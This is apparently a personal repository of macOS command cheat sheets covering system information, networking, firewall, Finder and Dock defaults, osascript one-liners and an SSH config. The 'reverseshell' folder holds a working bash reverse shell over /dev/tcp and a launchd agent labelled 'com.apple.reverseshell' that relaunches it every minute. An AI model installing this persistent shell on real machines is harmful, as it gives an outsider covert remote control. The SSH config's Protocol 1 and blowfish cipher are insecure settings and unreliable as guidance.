├── .gitignore ├── MagicalLinks └── Readme.md ├── Readme.md ├── SSH └── Readme.md ├── commands └── Readme.md ├── defaults └── Readme.md ├── osascript └── Readme.md └── reverseshell ├── Readme.md ├── com.apple.reverseshell.plist └── reverse.sh /.gitignore: -------------------------------------------------------------------------------- 1 | .DS_Store 2 | 3 | -------------------------------------------------------------------------------- /MagicalLinks/Readme.md: -------------------------------------------------------------------------------- 1 | # Magical Links 2 | 3 | - imessage:// start a Messages conversation within the Messages app 4 | - facetime:// start a FaceTime conversation within the FaceTime app 5 | - dict:// start the Dictionary app and look up for particular word 6 | - vnc:// start a screen-sharing session 7 | - x-man-page:// start terminal app with man-page 8 | - mailto:// start mail 9 | - ssh:// start terminal app with ssh connection 10 | - telnet:// start terminal app with telnet connection 11 | -------------------------------------------------------------------------------- /Readme.md: -------------------------------------------------------------------------------- 1 | # macOS 2 | 3 | ... don't need this always, but now i cannot forget ... 4 | 5 | - [Commands](./commands) 6 | - [defaults](./defaults) 7 | - [osascript examples](./osascript) 8 | - [SSH](./SSH) 9 | - [Magical Links](./MagicalLinks) 10 | - [Reverse Shell](./reverseshell) 11 | -------------------------------------------------------------------------------- /SSH/Readme.md: -------------------------------------------------------------------------------- 1 | # SSH config 2 | 3 | ```shell 4 | Host * 5 | Protocol 2,1 6 | PasswordAuthentication no 7 | ChallengeResponseAuthentication no 8 | HashKnownHosts yes 9 | CheckHostIP yes 10 | Compression yes 11 | ServerAliveInterval 30 12 | ServerAliveCountMax 120 13 | 14 | Host 15 | HostName 16 | User 17 | AddressFamily inet 18 | Cipher blowfish-cbc 19 | ``` 20 | 21 | By default, macOS does not have sshd or Remote Login enabled. To enable sshd and allow incoming ssh connections: 22 | 23 | ```shell 24 | $ sudo launchctl load -w /System/Library/LaunchDaemons/ssh.plist 25 | ``` 26 | -------------------------------------------------------------------------------- /commands/Readme.md: -------------------------------------------------------------------------------- 1 | # Commands 2 | 3 | ## Softwareupdate 4 | 5 | ```shell 6 | # list all available updates 7 | $ softwareupdate -l 8 | 9 | # install specific updates 10 | $ sudo softwareupdate -i 11 | 12 | # install all updates 13 | $ sudo softwareupdate -iva 14 | ``` 15 | 16 | ## System informations 17 | 18 | ```shell 19 | # system version information 20 | $ sw_vers 21 | 22 | # list disks (including internal and external) 23 | $ diskutil list 24 | 25 | # view running system daemons 26 | $ sudo launchctl list 27 | 28 | # list USB devices (via I/O Kit registry) 29 | $ ioreg -p IOUSB 30 | 31 | # list USB devices (via I/O Kit registry and show properties) 32 | $ ioreg -p IOUSB -l 33 | 34 | # list USB devices (via I/O Kit registry and show properties with full-width display) 35 | $ ioreg -p IOUSB -w0 -l 36 | 37 | # show disk performance (disk0) 38 | $ iostat -d disk0 39 | 40 | # list users 41 | $ dscl . list /Users | grep -v '^_' 42 | 43 | # show memory statistics 44 | $ vm_stat 45 | 46 | # show status of loaded kernel extensions 47 | $ sudo kextstat -l 48 | 49 | # list all users 50 | $ dscl . list /Users 51 | 52 | # list all users and informations 53 | $ dscacheutil -q user 54 | 55 | # list all groups and informations 56 | $ dscacheutil -q group 57 | ``` 58 | 59 | ## System profiler 60 | 61 | ```shell 62 | # show all informations 63 | $ system_profiler 64 | 65 | # show with specific detail level (basic|mini|full) 66 | $ system_profiler -detailLevel mini 67 | 68 | # show in specific format 69 | $ system_profiler -detailLevel mini -xml 70 | 71 | # list data types 72 | $ system_profiler -listDataTypes 73 | 74 | # list USB devices 75 | $ system_profiler SPUSBDataType 76 | 77 | # show processor 78 | $ system_profiler SPHardwareDataType | grep "Processor" 79 | 80 | # show model 81 | $ system_profiler SPHardwareDataType | grep "Model Identifier" 82 | 83 | # show screen resolution 84 | $ system_profiler SPDisplaysDataType | grep "Resolution" 85 | 86 | # show remaining battery (percentage) 87 | $ pmset -g batt | egrep "([0-9]+\%).*" -o --colour=auto | cut -f1 -d';' 88 | 89 | # show remaining battery (time) 90 | $ pmset -g batt | egrep "([0-9]+\%).*" -o --colour=auto | cut -f3 -d';' 91 | ``` 92 | 93 | ## Commandline Tools 94 | 95 | ```shell 96 | # check if installed 97 | $ xcode-select -p 98 | ... 99 | /Library/Developer/CommandLineTools 100 | ... 101 | 102 | # install 103 | $ xcode-select --install 104 | ``` 105 | 106 | ## Firewall 107 | 108 | ```shell 109 | # enable firewall 110 | $ sudo /usr/libexec/ApplicationFirewall/socketfilterfw --setglobalstate on 111 | 112 | # enable logging 113 | $ sudo /usr/libexec/ApplicationFirewall/socketfilterfw --setloggingmode on 114 | 115 | # enable stealth mode 116 | $ sudo /usr/libexec/ApplicationFirewall/socketfilterfw --setstealthmode on 117 | 118 | # restart 119 | $ sudo pkill -HUP socketfilterfw 120 | ``` 121 | 122 | ## Network 123 | 124 | ```shell 125 | # clear arp cache 126 | $ arp -ad 127 | 128 | # show ip (en0) 129 | $ ipconfig getifaddr en0 130 | 131 | # show subnet mask (en0) 132 | $ ipconfig getoption en0 subnet_mask 133 | 134 | # show dns server (en0) 135 | $ ipconfig getoption en0 domain_name_server 136 | 137 | # show mac address (en0) 138 | $ ifconfig en0 | grep 'ether' | cut -d " " -f2 139 | 140 | # restart interface (en0) 141 | $ sudo ifconfig en0 down && sudo ifconfig en0 up 142 | 143 | # list open network files 144 | $ sudo lsof -Pni 145 | 146 | # list contents of various network-related data structures 147 | $ sudo netstat -atln 148 | 149 | # show list of locations 150 | $ networksetup -listlocations 151 | 152 | # show current location 153 | $ networksetup -getcurrentlocation 154 | 155 | # show all network interfaces 156 | $ networksetup -listallnetworkservices 157 | 158 | # displays list of hardware ports 159 | $ networksetup -listallhardwareports 160 | 161 | # displays a list of network services 162 | $ networksetup -listnetworkserviceorder 163 | 164 | # show specific Displays ethernet address 165 | $ networksetup -getmacaddress en0 166 | 167 | # disable interface (en0) 168 | $ networksetup -setairportpower en0 off 169 | 170 | # enable interface (en0) 171 | $ networksetup -setairportpower en0 on 172 | 173 | # show available wifi networks 174 | $ /System/Library/PrivateFrameworks/Apple80211.framework/Versions/Current/Resources/airport -s 175 | 176 | # show current status of wifi 177 | $ /System/Library/PrivateFrameworks/Apple80211.framework/Versions/Current/Resources/airport -I 178 | 179 | # disconnect from wifi network 180 | $ sudo /System/Library/PrivateFrameworks/Apple80211.framework/Versions/Current/Resources/airport -z 181 | 182 | # show saved WiFi informations 183 | $ cat /Library/Preferences/SystemConfiguration/com.apple.airport.preferences.plist 184 | 185 | # flush DNS 186 | $ sudo killall -HUP mDNSResponder 187 | 188 | # scan port of URL range 189 | $ /System/Library/CoreServices/Applications/Network\ Utility.app/Contents/Resources/stroke www.google.com 80 80 190 | ``` 191 | 192 | ## Date and Time 193 | 194 | ```shell 195 | # list available timezones 196 | $ sudo systemsetup -listtimezones 197 | 198 | # set timezone 199 | $ sudo systemsetup -settimezone Europe/Berlin 200 | 201 | # get current status 202 | $ sudo systemsetup getusingnetworktime 203 | 204 | # enable using network time 205 | $ sudo systemsetup setusingnetworktime on 206 | 207 | # disable using network time 208 | $ sudo systemsetup setusingnetworktime off 209 | ``` 210 | 211 | ## Remote Apple Events 212 | 213 | ```shell 214 | # get current status 215 | $ sudo systemsetup -getremoteappleevents 216 | 217 | # enable remote events 218 | $ sudo systemsetup -setremoteappleevents on 219 | 220 | # disable remote events 221 | $ sudo systemsetup -setremoteappleevents off 222 | ``` 223 | 224 | ## enable/disable features 225 | 226 | ```shell 227 | # enable locate 228 | $ sudo launchctl load -w /System/Library/LaunchDaemons/com.apple.locate.plist 229 | 230 | # disable notification center service 231 | $ launchctl unload -w /System/Library/LaunchAgents/com.apple.notificationcenterui.plist && \ 232 | killall -9 NotificationCenter 233 | 234 | # enable notification center service 235 | $ launchctl load -w /System/Library/LaunchAgents/com.apple.notificationcenterui.plist 236 | 237 | # enable remote login 238 | $ sudo launchctl load -w /System/Library/LaunchDaemons/ssh.plist 239 | 240 | # disable remote login 241 | $ sudo launchctl unload -w /System/Library/LaunchDaemons/ssh.plist 242 | ``` 243 | 244 | ## just for fun 245 | 246 | ```shell 247 | # show calendar of specific year 248 | $ ncal -w 2018 249 | 250 | # permanently show Library 251 | $ chflags nohidden ~/Library/ 252 | 253 | # permanently hide Library 254 | $ chflags hidden ~/Library/ 255 | 256 | # stress your Mac 257 | $ yes > /dev/null 258 | 259 | # hide files (without .) 260 | $ chflags hidden 261 | 262 | # unhide files (without .) 263 | $ chflags nohidden 264 | 265 | # start quicklook 266 | $ qlmanage -p Pictures/ 267 | 268 | # piping output into apps 269 | $ ls -la | open -f 270 | $ ls -la | open -f -a Atom 271 | $ ls -la | open -f -a TextMate 272 | 273 | # list installed Apps (via AppStore) 274 | $ mdfind kMDItemAppStoreHasReceipt=1 275 | 276 | # enable TRIM commands on third-party drives 277 | $ sudo trimforce enable 278 | 279 | # force disk cache to be purged 280 | $ sudo purge 281 | 282 | # show download history 283 | $ sqlite3 ~/Library/Preferences/com.apple.LaunchServices.QuarantineEventsV* 'select LSQuarantineDataURLString from LSQuarantineEvent' 284 | 285 | # prevent sleep 286 | $ caffeinate 287 | 288 | # show important dates 289 | $ cat /usr/share/calendar/calendar.history 290 | $ cat /usr/share/calendar/calendar.lotr 291 | $ cat /usr/share/calendar/calendar.birthday 292 | $ cat /usr/share/calendar/calendar.freebsd 293 | 294 | # lock screen 295 | $ /System/Library/CoreServices/Menu\ Extras/User.menu/Contents/Resources/CGSession -suspend 296 | ``` 297 | 298 | ## Reset Network Settings 299 | 300 | ```shell 301 | # change directory 302 | $ cd /Library/Preferences/SystemConfiguration/ 303 | 304 | # delete files 305 | $ sudo rm -f com.apple.airport.preferences.plist com.apple.network.identification.plist com.apple.wifi.message-tracer.plist NetworkInterfaces.plist preferences.plist 306 | ``` 307 | -------------------------------------------------------------------------------- /defaults/Readme.md: -------------------------------------------------------------------------------- 1 | # defaults 2 | 3 | Set preferences, the macOS user defaults system works with both the OS and with individual applications. 4 | 5 | **Note:** If you change a default that belongs to a running application, the application won't see the change and might even overwrite the default. In general you should close an application before changing its defaults, in the case of Dock and Finder defaults - restart them after applying! Preferences are stored in a set of files under _~/Library/Preferences_, however using the defaults command is much safer than manually editing a .plist file. 6 | 7 | ## Dock 8 | 9 | ```shell 10 | # restart Dock 11 | $ killall Dock 12 | 13 | # reset to factory settings 14 | $ defaults delete com.apple.Dock 15 | 16 | # show current dock settings 17 | $ defaults read com.apple.Dock 18 | 19 | # add blank space 20 | $ defaults write com.apple.Dock persistent-apps -array-add '{tile-data={}; tile-type="spacer-tile";}' 21 | 22 | # add recent items folder 23 | $ defaults write com.apple.Dock persistent-others -array-add '{"tile-data" = {"list-type" = 1;}; "tile-type" = "recents-tile";}' 24 | 25 | # highlights the item under the cursor 26 | $ defaults write com.apple.Dock mouse-over-hilite-stack -bool yes 27 | 28 | # show only active Apps 29 | $ defaults write com.apple.Dock static-only -bool true 30 | 31 | # active single app mode 32 | $ defaults write com.apple.Dock single-app -bool true 33 | 34 | # show hidden apps 35 | $ defaults write com.apple.Dock showhidden -bool yes 36 | 37 | # set icon size to 45 pixels 38 | $ defaults write com.apple.Dock tilesize -int 45 39 | 40 | # disable auto hide 41 | $ defaults write com.apple.Dock autohide -bool false 42 | 43 | # enable auto hide 44 | $ defaults write com.apple.Dock autohide -bool true 45 | 46 | # position bottom 47 | $ defaults write com.apple.Dock orientation -string bottom 48 | 49 | # position left 50 | $ defaults write com.apple.Dock orientation -string left 51 | 52 | # position right 53 | $ defaults write com.apple.Dock orientation -string right 54 | 55 | # show wallpaper location 56 | $ defaults write com.apple.Dock desktop-picture-show-debug-text -bool true 57 | 58 | # don't show wallpaper location 59 | $ defaults delete com.apple.Dock desktop-picture-show-debug-text 60 | 61 | # disable animations when you open an application from the Dock 62 | $ defaults write com.apple.Dock launchanim -bool false 63 | 64 | # disable delay when you hide the Dock 65 | $ defaults write com.apple.Dock autohide-delay -float 0 66 | 67 | #set speed for Mission Control (fast) 68 | $ defaults write com.apple.Dock expose-animation-duration -float 0.1 69 | ``` 70 | 71 | # Launchpad 72 | 73 | ```shell 74 | # restart Launchpad 75 | $ killall Dock 76 | 77 | # enlarging the Icons 78 | $ defaults write com.apple.Dock springboard-rows -int 4 79 | $ defaults write com.apple.Dock springboard-columns -int 4 80 | 81 | # shrinking the Icons 82 | $ defaults write com.apple.Dock springboard-rows -int 10 83 | $ defaults write com.apple.Dock springboard-columns -int 10 84 | 85 | # reset to factory seetings 86 | $ defaults delete com.apple.Dock springboard-rows 87 | $ defaults delete com.apple.Dock springboard-columns 88 | $ defaults write com.apple.Dock ResetLaunchPad -bool true 89 | ``` 90 | 91 | # Dashboard 92 | 93 | ```shell 94 | # restart Dashboard 95 | $ killall Dock 96 | 97 | # show current Dashboard settings 98 | $ defaults read com.apple.Dashboard 99 | 100 | # disable dashboard 101 | $ defaults write com.apple.Dashboard mcx-disabled -boolean true 102 | 103 | # enable dashboard 104 | $ defaults write com.apple.Dashboard mcx-disabled -boolean false 105 | ``` 106 | 107 | ## Finder 108 | 109 | ```shell 110 | # restart Finder 111 | $ killall Finder 112 | 113 | # show current Finder settings 114 | $ defaults read com.apple.Finder 115 | 116 | # show hidden files 117 | $ defaults write com.apple.Finder AppleShowAllFiles YES 118 | 119 | # hide hidden files 120 | $ defaults write com.apple.Finder AppleShowAllFiles NO 121 | 122 | # hide file extension 123 | $ defaults write NSGlobalDomain AppleShowAllExtensions -bool false 124 | 125 | # show file extension 126 | $ defaults write NSGlobalDomain AppleShowAllExtensions -bool true 127 | 128 | # enable timestamp on zip filenames 129 | $ defaults write com.apple.Finder ArchiveTimestamp -bool true 130 | 131 | # disable timestamp on zip filenames 132 | $ defaults delete com.apple.Finder ArchiveTimestamp 133 | 134 | # turn of empty trash sound 135 | $ defaults write com.apple.Finder FinderSounds -bool false 136 | 137 | # turn on empty trash sound 138 | $ defaults delete com.apple.Finder FinderSounds 139 | 140 | # folders on top when sorting by name 141 | $ defaults write com.apple.Finder _FXSortFoldersFirst -bool true 142 | 143 | # show POSIX path 144 | $ defaults write com.apple.Finder _FXShowPosixPathInTitle -bool true 145 | 146 | # show status bar 147 | $ defaults write com.apple.Finder ShowStatusBar -bool true 148 | 149 | # show path bar 150 | $ defaults write com.apple.Finder ShowPathbar -bool true 151 | 152 | # disable animation when opening the Info window in Finder 153 | $ defaults write com.apple.Finder DisableAllAnimations -bool true 154 | 155 | # show internal hard drives on desktop 156 | $ defaults write com.apple.Finder ShowHardDrivesOnDesktop -bool true 157 | 158 | # show external hard drives on desktop 159 | $ defaults write com.apple.Finder ShowExternalHardDrivesOnDesktop -bool true 160 | 161 | # show removable media on desktop 162 | $ defaults write com.apple.Finder ShowRemovableMediaOnDesktop -bool true 163 | 164 | # show mounted servers on desktop 165 | $ defaults write com.apple.Finder ShowMountedServersOnDesktop -bool true 166 | 167 | # disable the warning before emptying the Trash 168 | $ defaults write com.apple.Finder WarnOnEmptyTrash -bool false 169 | ``` 170 | 171 | ## Safari 172 | 173 | ```shell 174 | # show current safari settings 175 | $ defaults read com.apple.Safari 176 | 177 | # disable safari auto open files 178 | $ defaults write com.apple.Safari AutoOpenSafeDownloads -bool false 179 | 180 | # enable safari auto open files 181 | $ defaults write com.apple.Safari AutoOpenSafeDownloads -bool true 182 | 183 | # hide bookmarks bar 184 | $ defaults write com.apple.Safari ShowFavoritesBar -bool false 185 | 186 | # show bookmarks bar 187 | $ defaults write com.apple.Safari ShowFavoritesBar -bool true 188 | 189 | # hide developer menu 190 | $ defaults write com.apple.Safari IncludeDevelopMenu -bool false 191 | 192 | # show developer menu 193 | $ defaults write com.apple.Safari IncludeDevelopMenu -bool true 194 | 195 | # enable tab memory 196 | $ defaults write com.apple.Safari NSQuitAlwaysKeepsWindows -bool true 197 | 198 | # disable tab memory 199 | $ defaults write com.apple.Safari NSQuitAlwaysKeepsWindows -bool false 200 | ``` 201 | 202 | ## Preview 203 | 204 | ```shell 205 | # show current preview settings 206 | $ defaults read com.apple.Preview 207 | ``` 208 | 209 | ## Terminal 210 | 211 | ```shell 212 | # show current terminal settings 213 | $ defaults read com.apple.Terminal 214 | 215 | # disable line marks 216 | $ defaults write com.apple.Terminal ShowLineMarks -int 0 217 | 218 | # use UTF-8 only 219 | $ defaults write com.apple.Terminal StringEncodings -array 4 220 | ``` 221 | 222 | ## Spotlight 223 | 224 | ```shell 225 | # show current spotlight settings 226 | $ defaults read com.apple.Spotlight 227 | ``` 228 | 229 | ## Photos 230 | 231 | ```shell 232 | # show current photos settings 233 | $ defaults read com.apple.Photos 234 | 235 | # prevent automatically opening 236 | $ defaults -currentHost write com.apple.ImageCapture disableHotPlug -bool true 237 | ``` 238 | 239 | ## ScreenSharing 240 | 241 | ```shell 242 | # show current screensharing settings 243 | $ defaults read com.apple.ScreenSharing 244 | ``` 245 | 246 | ## QuickTime 247 | 248 | ```shell 249 | # show current QuickTime settings 250 | $ defaults read com.apple.QuickTimePlayerX 251 | 252 | # diable rounded corners 253 | $ defaults write com.apple.QuickTimePlayerX MGCinematicWindowDebugForceNoRoundedCorners -bool true 254 | 255 | # enable rounded corners 256 | $ defaults delete com.apple.QuickTimePlayerX MGCinematicWindowDebugForceNoRoundedCorners 257 | 258 | # enable autostart movies 259 | $ defaults write com.apple.QuickTimePlayerX MGPlayMovieOnOpen -bool true 260 | 261 | # disable autostart movies 262 | $ defaults delete com.apple.QuickTimePlayerX MGPlayMovieOnOpen 263 | 264 | # disable controller bar 265 | $ defaults write com.apple.QuickTimePlayerX MGUIVisibilityNeverAutoshow -bool true 266 | 267 | # enable controller bar 268 | $ defaults delete com.apple.QuickTimePlayerX MGUIVisibilityNeverAutoshow 269 | 270 | # enable auto show subtitles 271 | $ defaults write com.apple.QuickTimePlayerX MGEnableCCAndSubtitlesOnOpen -bool true 272 | 273 | # disable auto show subtitles 274 | $ defaults delete com.apple.QuickTimePlayerX MGEnableCCAndSubtitlesOnOpen 275 | ``` 276 | 277 | ## Apache 278 | 279 | ```shell 280 | # read apache LaunchDaemons settings 281 | $ defaults read /System/Library/LaunchDaemons/org.apache.httpd.plist 282 | 283 | # enable apache on boot 284 | $ sudo defaults write /System/Library/LaunchDaemons/org.apache.httpd Disabled -bool false 285 | ``` 286 | 287 | ## Wifi 288 | 289 | ```shell 290 | # show Wi-Fi connection history 291 | $ defaults read /Library/Preferences/SystemConfiguration/com.apple.airport.preferences | grep LastConnected -A 7 292 | ``` 293 | 294 | ## Enable/Disable features 295 | 296 | ```shell 297 | # disable autocorrect 298 | $ defaults write NSGlobalDomain NSAutomaticSpellingCorrectionEnabled -bool false 299 | 300 | # enable autocorrect 301 | $ defaults write NSGlobalDomain NSAutomaticSpellingCorrectionEnabled -bool true 302 | 303 | # disable .DS_Store 304 | $ defaults write com.apple.desktopservices DSDontWriteNetworkStores true 305 | 306 | # enable .DS_Store 307 | $ defaults write com.apple.desktopservices DSDontWriteNetworkStores false 308 | 309 | # disable crash reporter 310 | $ defaults write com.apple.CrashReporter DialogType none 311 | 312 | # disable save into iCloud 313 | $ defaults write NSGlobalDomain NSDocumentSaveNewDocumentsToCloud -bool false 314 | 315 | # disable rubber-band scrolling 316 | $ defaults write -g NSScrollViewRubberbanding -int 0 317 | 318 | # enable rubber-band scrolling 319 | $ defaults delete -g NSScrollViewRubberbanding 320 | 321 | # enable AirDrop for ethernet 322 | $ defaults write com.apple.NetworkBrowser BrowseAllInterfaces -bool true 323 | 324 | # expand save dialog 325 | $ defaults write NSGlobalDomain NSNavPanelExpandedStateForSaveMode -bool true 326 | 327 | # expand print dialog 328 | $ defaults write NSGlobalDomain PMPrintingExpandedStateForPrint -bool true 329 | 330 | # disable animations when opening and closing windows 331 | $ defaults write NSGlobalDomain NSAutomaticWindowAnimationsEnabled -bool false 332 | 333 | # disable animations when opening a Quick Look window 334 | $ defaults write -g QLPanelAnimationDuration -float 0 335 | ``` 336 | -------------------------------------------------------------------------------- /osascript/Readme.md: -------------------------------------------------------------------------------- 1 | # osascript 2 | 3 | Some one-liners which improve daily workflow... 4 | 5 | ## System Events 6 | 7 | ```shell 8 | # shutdown without confirmation 9 | $ osascript -e 'tell application "System Events" to shut down' 10 | 11 | # restart without confirmation 12 | $ osascript -e 'tell application "System Events" to restart' 13 | ``` 14 | 15 | ## Volume 16 | 17 | ```shell 18 | # show current volume 19 | $ osascript -e 'output volume of (get volume settings)' 20 | 21 | # set volume (0 - 100) 22 | $ osascript -e 'set volume output volume 50' 23 | 24 | # show mute state 25 | $ osascript -e 'output muted of (get volume settings)' 26 | 27 | # set mute state (true, false) 28 | $ osascript -e 'set volume output muted true' 29 | ``` 30 | 31 | ## Finder 32 | 33 | ```shell 34 | # open hard drive that contains the currently running System folder 35 | $ osascript -e 'tell application "Finder" to open the startup disk' 36 | 37 | # open home directory in Finder 38 | $ osascript -e 'tell application "Finder" to open home' 39 | 40 | # get name of front Finder window 41 | $ osascript -e 'tell application "Finder" to get the name of front Finder window' 42 | 43 | # get position of front Finder window 44 | $ osascript -e 'tell application "Finder" to get the position of the front Finder window' 45 | 46 | # set position of front Finder window 47 | $ osascript -e 'tell application "Finder" to set the position of the front Finder window to {94, 134}' 48 | 49 | # open new Finder window 50 | $ osascript -e 'tell application "Finder" to make new Finder window' 51 | 52 | # close all Finder windows 53 | $ osascript -e 'tell application "Finder" to close every window' 54 | 55 | # empty Trash 56 | $ osascript -e 'tell application "Finder" to empty trash' 57 | 58 | # set background image 59 | $ osascript -e 'tell application "Finder" to set desktop picture to POSIX file ""' 60 | 61 | # eject all mountable volumes 62 | $ osascript -e 'tell application "Finder" to eject (every disk whose ejectable is true)' 63 | 64 | # choose file by Finder and print parent folder 65 | $ osascript -e 'tell application "Finder" to get name of container of (choose file)' 66 | 67 | # hide Calendar 68 | $ osascript -e 'tell application "Finder"' -e 'set visible of process "Calendar" to false' -e 'end tell' 69 | ``` 70 | 71 | ## Messages 72 | 73 | ```shell 74 | # open Messages 75 | $ osascript -e 'tell application "messages" to activate' 76 | ``` 77 | 78 | ## Safari 79 | 80 | ```shell 81 | # open and focus Safari 82 | $ osascript -e 'tell application "Safari" to activate' 83 | 84 | # close Safari 85 | $ osascript -e 'quit application "safari.app"' 86 | 87 | # get current URL 88 | $ osascript -e 'tell application "Safari" to get URL of current tab of front window' 89 | 90 | # change to 2nd tab 91 | $ osascript -e 'tell application "Safari" to tell front window to set current tab to tab 2' 92 | 93 | # close 1st tab 94 | $ osascript -e 'tell application "Safari" to close tab 1 of window 1' 95 | ``` 96 | 97 | # QuickTime 98 | 99 | ```shell 100 | # play movie of front QuickTime 101 | $ osascript -e 'tell application "QuickTime Player" to play the front movie' 102 | 103 | # stop movie of front QuickTime 104 | $ osascript -e 'tell application "QuickTime Player" to stop the front movie' 105 | ``` 106 | 107 | ## iTunes 108 | 109 | ```shell 110 | # open iTunes 111 | $ osascript -e 'tell application "iTunes" to activate' 112 | 113 | # get name of last song in playlist 114 | $ osascript -e 'tell application "iTunes" to get the name of the last track of the first library playlist' 115 | 116 | # stop iTunes 117 | $ osascript -e 'tell application "iTunes" to stop' 118 | ``` 119 | -------------------------------------------------------------------------------- /reverseshell/Readme.md: -------------------------------------------------------------------------------- 1 | # macOS Reverse Shell setup 2 | 3 | ```shell 4 | # edit (, ) 5 | $ vim reverse.sh 6 | 7 | # copy reverse.sh 8 | $ cp reverse.sh ~/Library/ && chmod +x ~/Library/reverse.sh 9 | 10 | # create folder 11 | $ mkdir ~/Library/LaunchAgents/ 12 | 13 | # edit (replace , change interval) 14 | $ vim com.apple.reverseshell.plist 15 | 16 | # copy com.apple.reverseshell.plist 17 | $ cp com.apple.reverseshell.plist ~/Library/LaunchAgents/ 18 | 19 | # start 20 | $ launchctl load com.apple.reverseshell.plist 21 | 22 | # stop 23 | $ launchctl unload -w com.apple.reverseshell.plist 24 | 25 | # clean up 26 | $ rm -fr ~/Library/LaunchAgents/ \ 27 | && rm -f ~/Library/reverse.sh \ 28 | && rm -f /tmp/reverseshell.err \ 29 | && rm -f /tmp/reverseshell.out 30 | ``` 31 | -------------------------------------------------------------------------------- /reverseshell/com.apple.reverseshell.plist: -------------------------------------------------------------------------------- 1 | 2 | 3 | 4 | 5 | Label 6 | com.apple.reverseshell 7 | 8 | ProgramArguments 9 | 10 | /Users//Library/reverse.sh 11 | 12 | 13 | Nice 14 | 1 15 | 16 | StartInterval 17 | 60 18 | 19 | RunAtLoad 20 | 21 | 22 | StandardErrorPath 23 | /tmp/reverseshell.err 24 | 25 | StandardOutPath 26 | /tmp/reverseshell.out 27 | 28 | 29 | -------------------------------------------------------------------------------- /reverseshell/reverse.sh: -------------------------------------------------------------------------------- 1 | #!/usr/bin/env bash 2 | 3 | # define magic variables 4 | declare -r TARGET_IP='' 5 | declare -r TARGET_PORT='' 6 | 7 | # functions 8 | function setVolume() { 9 | osascript -e 'set volume output volume 50' 10 | } 11 | 12 | function startReverseShell() { 13 | /usr/bin/env bash -i >& /dev/tcp/"${TARGET_IP}"/"${TARGET_PORT}" 0>&1 14 | } 15 | 16 | function main() { 17 | if ping -t 2 -c 1 "${TARGET_IP}" &> /dev/null; then 18 | setVolume 19 | startReverseShell 20 | fi 21 | } 22 | 23 | main 24 | --------------------------------------------------------------------------------